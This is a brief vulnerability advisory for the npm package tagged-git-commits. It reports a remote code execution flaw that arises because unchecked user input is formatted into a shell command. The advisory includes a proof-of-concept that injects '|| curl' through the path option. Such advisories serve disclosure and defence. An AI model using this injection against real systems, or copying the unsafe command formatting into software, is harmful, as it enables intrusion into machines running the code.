tagged-git-commits

vulnerability remote code execution

severity 3.8

language javascript

registry npm

Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/aichbauer/node-tagged-git-commits/blob/master/index.js#L29

PoC

// poc.js
const taggedCommits = require('tagged-git-commits');

taggedCommits({
    path: './git || curl "http://localhost/RCE"',
});

Impact

RCE on tagged-git-commits via insecure command formatting

References

GitHub Issue
Permalink #1
Permalink #2
Permalink #3
Permalink #4
Permalink #5
Permalink #6
Permalink #7
Permalink #8